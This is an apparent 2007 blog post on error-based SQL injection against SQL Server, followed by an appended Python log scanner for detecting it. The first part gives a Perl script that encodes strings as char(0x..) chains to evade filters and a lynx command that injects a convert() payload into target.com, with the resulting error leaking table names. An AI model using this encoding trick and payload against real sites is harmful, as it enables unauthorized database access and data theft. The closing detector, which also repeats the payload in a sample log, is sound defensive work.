Tuesday, August 28, 2007

SQL injection -- convert method (continue)

My friend told me to encode some of the injection parameters from ASCII to hex code, so I wrote a small Perl script to do the job for me:

shaolinint@slash$ cat ascii2hex.pl
#!/usr/bin/perl
# Encode every byte of the argument as a SQL Server char(0xNN) term, with the
# terms joined by a URL-encoded '+' (%2B) so the result can go into a query string.
my $cmd = shift or die "usage: $0 string\n";
# %02x keeps two hex digits per byte (a bare %2x pads with a space for bytes < 0x10),
# and %% is needed for a literal percent sign inside a sprintf format.
$cmd =~ s/(.)/ sprintf("char(0x%02x)%%2B", ord($1)) /ge;
chomp($cmd);
print "$cmd\n";

shaolinint@slash$ perl ascii2hex.pl table1
char(0x74)%2Bchar(0x61)%2Bchar(0x62)%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31)

I had to remove the '%2B' at the end of the output above to make it work on real injections:

shaolinint@slash$ lynx -dump http://www.target.com/hello.aspx?id=(convert(varchar(255),(SELECT+top+1+table_name+FROM+
information_schema.tables+WHERE+table_name+NOT+IN(char(0x74)%2Bchar(0x61)%2Bchar(0x62)
%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31))))--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '{]table2 to a column of data type int.

The injection parameter works fine for me, but there is a small problem: I still cannot get the data from all tables and columns at the moment.
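The following Python is an added defender-side example, not code from the original post: it decodes such char(0x..)%2B chains back to the literal they spell out and flags requests carrying the convert()/information_schema markers seen in the request above. The access-log lines are constructed, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# One or more SQL Server char(0xNN) terms joined by '+' (sent as %2B in a URL).
CHAR_CHAIN = re.compile(r"(?:char\(0x[0-9a-f]{1,2}\)\+?)+", re.IGNORECASE)
CHAR_TERM = re.compile(r"char\(0x([0-9a-f]{1,2})\)", re.IGNORECASE)
# Other markers of the convert()/information_schema probing shown in the post.
SQL_MARKERS = ("convert(", "information_schema", "--")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample access-log lines (not real traffic): one benign, one probe.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Aug/2007:10:01:02 +0000] "GET /hello.aspx?id=42 HTTP/1.1" 200 512
10.0.0.9 - - [28/Aug/2007:10:01:07 +0000] "GET /hello.aspx?id=(convert(varchar(255),(SELECT+top+1+table_name+FROM+information_schema.tables+WHERE+table_name+NOT+IN(char(0x74)%2Bchar(0x61)%2Bchar(0x62)%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31))))-- HTTP/1.1" 500 1024
"""


def decode_char_chain(chain: str) -> str:
    """Rebuild the literal that a char(0x..)+char(0x..) chain spells out."""
    return "".join(chr(int(h, 16)) for h in CHAR_TERM.findall(chain))


def inspect_request(raw_url: str) -> dict:
    """Decode one request URL and report encoded literals and SQL markers."""
    # unquote_plus maps '+' to a space and '%2B' to a literal '+', which is
    # how the database sees the parameter after the web tier decodes it.
    decoded = unquote_plus(raw_url)
    lowered = decoded.lower()
    literals = [decode_char_chain(m.group(0)) for m in CHAR_CHAIN.finditer(decoded)]
    markers = [tok for tok in SQL_MARKERS if tok in lowered]
    return {
        "literals": literals,
        "markers": markers,
        "suspicious": bool(literals) or len(markers) >= 2,
    }


def scan_log(text: str) -> list:
    """Return inspect_request() reports for every suspicious request in a log."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            report = inspect_request(m.group(1))
            if report["suspicious"]:
                hits.append(report)
    return hits
```

Running scan_log(SAMPLE_LOG) reports only the second line, with the decoded literal "table1" and all three markers present; the decoded literal is the value worth logging, since it is what the probe was trying to hide from simple keyword filters.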
